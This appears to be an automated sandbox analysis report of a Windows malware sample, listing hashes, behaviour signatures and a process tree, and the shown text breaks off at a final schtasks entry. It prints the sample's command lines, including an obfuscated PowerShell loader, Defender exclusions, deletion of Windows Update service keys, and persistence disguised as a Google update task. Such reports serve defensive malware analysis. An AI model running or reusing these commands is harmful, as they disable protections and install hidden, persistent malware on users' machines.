Analysis
- max time kernel: 150s
- max time network: 151s
- platform: windows7_x64
- resource: win7-20230621-en
- resource tags: arch:x64, arch:x86, image:win7-20230621-en, locale:en-us, os:windows7-x64, system
- submitted: 01-07-2023 08:30
Static task: static1
Behavioral task: behavioral1
- Sample: dmi1dfg7n.exe
- Resource: win7-20230621-en
Behavioral task: behavioral2
- Sample: dmi1dfg7n.exe
- Resource: win10v2004-20230621-en
General
- Target: dmi1dfg7n.exe
- Size: 2.8MB
- MD5: 9253ed091d81e076a3037e12af3dc871
- SHA1: ec02829a25b3bf57ad061bbe54180d0c99c76981
- SHA256: 78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
- SHA512: 29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
- SSDEEP: 49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
Malware Config
Signatures
- Modifies security service (2 TTPs, 2 IoCs)
  Processes: reg.exe
  description | ioc | process
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | reg.exe
  Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | reg.exe
- Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)
  Processes: powershell.EXE, powershell.EXE
  description | pid | process | target process
  PID 1204 created 420 | 1204 | powershell.EXE | winlogon.exe
  PID 568 created 420 | 568 | powershell.EXE | winlogon.exe
- Sets service image path in registry (2 TTPs, 1 IoCs)
  Processes: services.exe
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Program Files\\Google\\Libs\\WR64.sys" | services.exe
- Stops running service(s) (3 TTPs)
- Executes dropped EXE (1 IoCs)
  Processes: updater.exe
  pid | process
  320 | updater.exe
- Loads dropped DLL (1 IoCs)
  Processes: taskeng.exe
  pid | process
  948 | taskeng.exe
- Drops file in System32 directory (5 IoCs)
  Processes: powershell.exe, svchost.exe, powershell.EXE, powershell.EXE, powershell.exe
  description | ioc | process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC | svchost.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
- Suspicious use of SetThreadContext (5 IoCs)
  Processes: dmi1dfg7n.exe, powershell.EXE, powershell.EXE, updater.exe
  description | pid | process | target process
  PID 1364 set thread context of 836 | 1364 | dmi1dfg7n.exe | dialer.exe
  PID 1204 set thread context of 556 | 1204 | powershell.EXE | dllhost.exe
  PID 568 set thread context of 584 | 568 | powershell.EXE | dllhost.exe
  PID 320 set thread context of 1308 | 320 | updater.exe | dialer.exe
  PID 320 set thread context of 1072 | 320 | updater.exe | dialer.exe
- Drops file in Program Files directory (4 IoCs)
  Processes: dmi1dfg7n.exe, updater.exe, cmd.exe, cmd.exe
  description | ioc | process
  File created | C:\Program Files\Google\Chrome\updater.exe | dmi1dfg7n.exe
  File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
  File created | C:\Program Files\Google\Libs\g.log | cmd.exe
  File created | C:\Program Files\Google\Libs\g.log | cmd.exe
- Drops file in Windows directory (6 IoCs)
  Processes: dialer.exe, svchost.exe
  description | ioc | process
  File created | C:\Windows\Tasks\dialersvc32.job | dialer.exe
  File opened for modification | C:\Windows\Tasks\dialersvc32.job | dialer.exe
  File created | C:\Windows\Tasks\dialersvc64.job | dialer.exe
  File opened for modification | C:\Windows\Tasks\dialersvc64.job | dialer.exe
  File opened for modification | C:\Windows\appcompat\programs\RecentFileCache.bcf | svchost.exe
  File opened for modification | C:\Windows\Tasks\dialersvc32.job | svchost.exe
- Launches sc.exe (10 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  Processes: sc.exe (10 instances)
  pid | process
  1664 | sc.exe
  1892 | sc.exe
  1256 | sc.exe
  1100 | sc.exe
  760 | sc.exe
  296 | sc.exe
  556 | sc.exe
  2000 | sc.exe
  1584 | sc.exe
  1652 | sc.exe
- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: wmiprvse.exe
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
  Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
  Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | wmiprvse.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | wmiprvse.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | wmiprvse.exe
- Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Detects videocard installed (1 TTPs, 1 IoCs)
  Uses WMIC.exe to determine videocard installed.
- Modifies data under HKEY_USERS (3 IoCs)
  Processes: powershell.EXE, WMIC.exe
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.EXE
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d065de54f6abd901 | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes: powershell.exe, powershell.exe, powershell.exe, powershell.EXE, powershell.EXE, dllhost.exe, powershell.exe, dllhost.exe, powershell.exe
  pid / process (64 entries, in report order):
  1152 powershell.exe; 672 powershell.exe; 1072 powershell.exe; 1204 powershell.EXE; 1204 powershell.EXE; 568 powershell.EXE;
  556 dllhost.exe; 556 dllhost.exe; 556 dllhost.exe; 556 dllhost.exe; 556 dllhost.exe; 456 powershell.exe; 556 dllhost.exe; 568 powershell.EXE;
  584 dllhost.exe; 584 dllhost.exe; 556 dllhost.exe; 556 dllhost.exe; 584 dllhost.exe; 584 dllhost.exe; 1680 powershell.exe;
  556 dllhost.exe; 556 dllhost.exe; 584 dllhost.exe; 584 dllhost.exe; 584 dllhost.exe; 584 dllhost.exe;
  then the pattern 556 dllhost.exe; 556 dllhost.exe; 584 dllhost.exe; 584 dllhost.exe repeated 9 times, followed by a final 556 dllhost.exe
- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  Processes: Explorer.EXE
  pid | process
  1248 | Explorer.EXE
- Suspicious behavior: LoadsDriver (1 IoCs)
  Processes: services.exe
  pid | process
  468 | services.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: powershell.exe, powercfg.exe, powercfg.exe, powercfg.exe, powershell.exe, powercfg.exe, powershell.exe, powershell.EXE, powershell.EXE, dllhost.exe, powershell.exe, dllhost.exe, svchost.exe, powershell.exe, powercfg.exe, sc.exe, powercfg.exe, powercfg.exe, updater.exe, WMIC.exe
  description | pid | process
  Token: SeDebugPrivilege | 1152 | powershell.exe
  Token: SeShutdownPrivilege | 1828 | powercfg.exe
  Token: SeShutdownPrivilege | 900 | powercfg.exe
  Token: SeShutdownPrivilege | 1584 | powercfg.exe
  Token: SeDebugPrivilege | 672 | powershell.exe
  Token: SeShutdownPrivilege | 1000 | powercfg.exe
  Token: SeDebugPrivilege | 1072 | powershell.exe
  Token: SeDebugPrivilege | 1204 | powershell.EXE
  Token: SeDebugPrivilege | 1204 | powershell.EXE
  Token: SeDebugPrivilege | 568 | powershell.EXE
  Token: SeDebugPrivilege | 556 | dllhost.exe
  Token: SeDebugPrivilege | 456 | powershell.exe
  Token: SeDebugPrivilege | 568 | powershell.EXE
  Token: SeDebugPrivilege | 584 | dllhost.exe
  Token: SeAuditPrivilege | 848 | svchost.exe
  Token: SeDebugPrivilege | 1680 | powershell.exe
  Token: SeShutdownPrivilege | 1032 | powercfg.exe
  Token: SeShutdownPrivilege | 1652 | sc.exe
  Token: SeShutdownPrivilege | 1032 | powercfg.exe
  Token: SeShutdownPrivilege | 1520 | powercfg.exe
  Token: SeDebugPrivilege | 320 | updater.exe
  Token: SeAssignPrimaryTokenPrivilege | 1956 | WMIC.exe
  Token: SeIncreaseQuotaPrivilege | 1956 | WMIC.exe
  Token: SeSecurityPrivilege | 1956 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 1956 | WMIC.exe
  Token: SeLoadDriverPrivilege | 1956 | WMIC.exe
  Token: SeSystemtimePrivilege | 1956 | WMIC.exe
  Token: SeBackupPrivilege | 1956 | WMIC.exe
  Token: SeRestorePrivilege | 1956 | WMIC.exe
  Token: SeShutdownPrivilege | 1956 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 1956 | WMIC.exe
  Token: SeUndockPrivilege | 1956 | WMIC.exe
  Token: SeManageVolumePrivilege | 1956 | WMIC.exe
  Token: SeAssignPrimaryTokenPrivilege | 1956 | WMIC.exe
  Token: SeIncreaseQuotaPrivilege | 1956 | WMIC.exe
  Token: SeSecurityPrivilege | 1956 | WMIC.exe
  Token: SeTakeOwnershipPrivilege | 1956 | WMIC.exe
  Token: SeLoadDriverPrivilege | 1956 | WMIC.exe
  Token: SeSystemtimePrivilege | 1956 | WMIC.exe
  Token: SeBackupPrivilege | 1956 | WMIC.exe
  Token: SeRestorePrivilege | 1956 | WMIC.exe
  Token: SeShutdownPrivilege | 1956 | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 1956 | WMIC.exe
  Token: SeUndockPrivilege | 1956 | WMIC.exe
  Token: SeManageVolumePrivilege | 1956 | WMIC.exe
  Token: SeAssignPrimaryTokenPrivilege | 848 | svchost.exe
  Token: SeIncreaseQuotaPrivilege | 848 | svchost.exe
  Token: SeSecurityPrivilege | 848 | svchost.exe
  Token: SeTakeOwnershipPrivilege | 848 | svchost.exe
  Token: SeLoadDriverPrivilege | 848 | svchost.exe
  Token: SeSystemtimePrivilege | 848 | svchost.exe
  Token: SeBackupPrivilege | 848 | svchost.exe
  Token: SeRestorePrivilege | 848 | svchost.exe
  Token: SeShutdownPrivilege | 848 | svchost.exe
  Token: SeSystemEnvironmentPrivilege | 848 | svchost.exe
  Token: SeUndockPrivilege | 848 | svchost.exe
  Token: SeManageVolumePrivilege | 848 | svchost.exe
  Token: SeAssignPrimaryTokenPrivilege | 848 | svchost.exe
  Token: SeIncreaseQuotaPrivilege | 848 | svchost.exe
  Token: SeSecurityPrivilege | 848 | svchost.exe
  Token: SeTakeOwnershipPrivilege | 848 | svchost.exe
  Token: SeLoadDriverPrivilege | 848 | svchost.exe
  Token: SeSystemtimePrivilege | 848 | svchost.exe
  Token: SeBackupPrivilege | 848 | svchost.exe
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes: Explorer.EXE
  pid | process
  1248 | Explorer.EXE
  1248 | Explorer.EXE
- Suspicious use of SendNotifyMessage (2 IoCs)
  Processes: Explorer.EXE
  pid | process
  1248 | Explorer.EXE
  1248 | Explorer.EXE
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: dmi1dfg7n.exe, cmd.exe, cmd.exe, powershell.exe
  description | pid | process | target process (each row is repeated in the report the number of times given)
  PID 1364 wrote to memory of 1152 | 1364 | dmi1dfg7n.exe | powershell.exe (3 entries)
  PID 1364 wrote to memory of 1384 | 1364 | dmi1dfg7n.exe | cmd.exe (3 entries)
  PID 1364 wrote to memory of 584 | 1364 | dmi1dfg7n.exe | cmd.exe (3 entries)
  PID 1364 wrote to memory of 672 | 1364 | dmi1dfg7n.exe | powershell.exe (3 entries)
  PID 584 wrote to memory of 1828 | 584 | cmd.exe | powercfg.exe (3 entries)
  PID 1384 wrote to memory of 296 | 1384 | cmd.exe | sc.exe (3 entries)
  PID 584 wrote to memory of 900 | 584 | cmd.exe | powercfg.exe (3 entries)
  PID 1384 wrote to memory of 556 | 1384 | cmd.exe | sc.exe (3 entries)
  PID 584 wrote to memory of 1584 | 584 | cmd.exe | powercfg.exe (3 entries)
  PID 1384 wrote to memory of 1664 | 1384 | cmd.exe | sc.exe (3 entries)
  PID 584 wrote to memory of 1000 | 584 | cmd.exe | powercfg.exe (3 entries)
  PID 1384 wrote to memory of 1892 | 1384 | cmd.exe | sc.exe (3 entries)
  PID 1384 wrote to memory of 2000 | 1384 | cmd.exe | sc.exe (3 entries)
  PID 1384 wrote to memory of 552 | 1384 | cmd.exe | reg.exe (3 entries)
  PID 672 wrote to memory of 524 | 672 | powershell.exe | schtasks.exe (3 entries)
  PID 1384 wrote to memory of 1988 | 1384 | cmd.exe | reg.exe (3 entries)
  PID 1384 wrote to memory of 1168 | 1384 | cmd.exe | reg.exe (3 entries)
  PID 1384 wrote to memory of 1764 | 1384 | cmd.exe | reg.exe (3 entries)
  PID 1384 wrote to memory of 636 | 1384 | cmd.exe | reg.exe (3 entries)
  PID 1364 wrote to memory of 836 | 1364 | dmi1dfg7n.exe | dialer.exe (4 entries)
  PID 1364 wrote to memory of 1072 | 1364 | dmi1dfg7n.exe | powershell.exe (3 entries)
- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (depth in brackets; the image path is followed by the observed command line and the signatures that fired for that process)
- [1] C:\Windows\system32\winlogon.exe
  cmdline: winlogon.exe
- [2] C:\Windows\System32\dllhost.exe
  cmdline: C:\Windows\System32\dllhost.exe /Processid:{07f7d231-682b-448d-a41b-c0deaf9f5594}
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [2] C:\Windows\SysWOW64\dllhost.exe
  cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{d9280c1e-3af1-4303-9b38-03dd0dbc0fb7}
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\system32\services.exe
  cmdline: C:\Windows\system32\services.exe
  - Sets service image path in registry
  - Suspicious behavior: LoadsDriver
- [2] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
- [2] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
- [3] \\?\C:\Windows\system32\wbem\WMIADAP.EXE
  cmdline: wmiadap.exe /F /T /R
- [3] C:\Windows\system32\taskeng.exe
  cmdline: taskeng.exe {5F301E94-55C8-4AFE-921E-717E8A6E49CB} S-1-5-18:NT AUTHORITY\System:Service:
  - Loads dropped DLL
- [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [4] C:\Program Files\Google\Chrome\updater.exe
  cmdline: "C:\Program Files\Google\Chrome\updater.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
- [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [6] C:\Windows\system32\schtasks.exe
  cmdline: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
  - Creates scheduled task(s)
- [5] C:\Windows\system32\cmd.exe
  cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
- [6] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -hibernate-timeout-ac 0
  - Suspicious use of AdjustPrivilegeToken
- [6] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -hibernate-timeout-dc 0
- [6] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -standby-timeout-ac 0
  - Suspicious use of AdjustPrivilegeToken
- [6] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -standby-timeout-dc 0
  - Suspicious use of AdjustPrivilegeToken
- [5] C:\Windows\system32\cmd.exe
  cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
- [6] C:\Windows\system32\sc.exe
  cmdline: sc stop UsoSvc
  - Launches sc.exe
- [6] C:\Windows\system32\sc.exe
  cmdline: sc stop WaaSMedicSvc
  - Launches sc.exe
- [6] C:\Windows\system32\sc.exe
  cmdline: sc stop wuauserv
  - Launches sc.exe
- [6] C:\Windows\system32\sc.exe
  cmdline: sc stop bits
  - Launches sc.exe
- [6] C:\Windows\system32\sc.exe
  cmdline: sc stop dosvc
  - Launches sc.exe
  - Suspicious use of AdjustPrivilegeToken
- [6] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
- [6] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
- [6] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
- [6] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
- [6] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
- [5] C:\Windows\system32\dialer.exe
  cmdline: C:\Windows\system32\dialer.exe xtrjicqmdliu
- [6] C:\Windows\system32\cmd.exe
  cmdline: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  - Drops file in Program Files directory
- [5] C:\Windows\system32\cmd.exe
  cmdline: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  - Drops file in Program Files directory
- [6] C:\Windows\System32\Wbem\WMIC.exe
  cmdline: wmic PATH Win32_VideoController GET Name, VideoProcessor
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
- [5] C:\Windows\system32\dialer.exe
  cmdline: C:\Windows\system32\dialer.exe wvhbfinhdckusjju
- [2] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalService
- [2] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k NetworkService
- [2] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
- [3] C:\Windows\system32\Dwm.exe
  cmdline: "C:\Windows\system32\Dwm.exe"
- [2] C:\Windows\System32\spoolsv.exe
  cmdline: C:\Windows\System32\spoolsv.exe
- [2] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k RPCSS
- [2] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
- [2] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch
- [3] C:\Windows\system32\wbem\wmiprvse.exe
  cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  - Checks processor information in registry
- [2] C:\Windows\system32\taskhost.exe
  cmdline: "taskhost.exe"
- [2] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
- [2] C:\Windows\system32\sppsvc.exe
  cmdline: C:\Windows\system32\sppsvc.exe
- [1] C:\Windows\system32\lsass.exe
  cmdline: C:\Windows\system32\lsass.exe
- [1] C:\Windows\system32\lsm.exe
  cmdline: C:\Windows\system32\lsm.exe
- [1] C:\Windows\Explorer.EXE
  cmdline: C:\Windows\Explorer.EXE
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
- [2] C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
- [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [3] C:\Windows\system32\cmd.exe
  cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  - Suspicious use of WriteProcessMemory
- [4] C:\Windows\system32\sc.exe
  cmdline: sc stop UsoSvc
  - Launches sc.exe
- [4] C:\Windows\system32\sc.exe
  cmdline: sc stop WaaSMedicSvc
  - Launches sc.exe
- [4] C:\Windows\system32\sc.exe
  cmdline: sc stop wuauserv
  - Launches sc.exe
- [4] C:\Windows\system32\sc.exe
  cmdline: sc stop bits
  - Launches sc.exe
- [4] C:\Windows\system32\sc.exe
  cmdline: sc stop dosvc
  - Launches sc.exe
- [4] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
- [4] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
- [4] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  - Modifies security service
- [4] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
- [4] C:\Windows\system32\reg.exe
  cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
- [3] C:\Windows\system32\cmd.exe
  cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  - Suspicious use of WriteProcessMemory
- [4] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -hibernate-timeout-ac 0
  - Suspicious use of AdjustPrivilegeToken
- [4] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -hibernate-timeout-dc 0
  - Suspicious use of AdjustPrivilegeToken
- [4] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -standby-timeout-ac 0
  - Suspicious use of AdjustPrivilegeToken
- [4] C:\Windows\system32\powercfg.exe
  cmdline: powercfg /x -standby-timeout-dc 0
  - Suspicious use of AdjustPrivilegeToken
- [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- [4] C:\Windows\system32\schtasks.exe
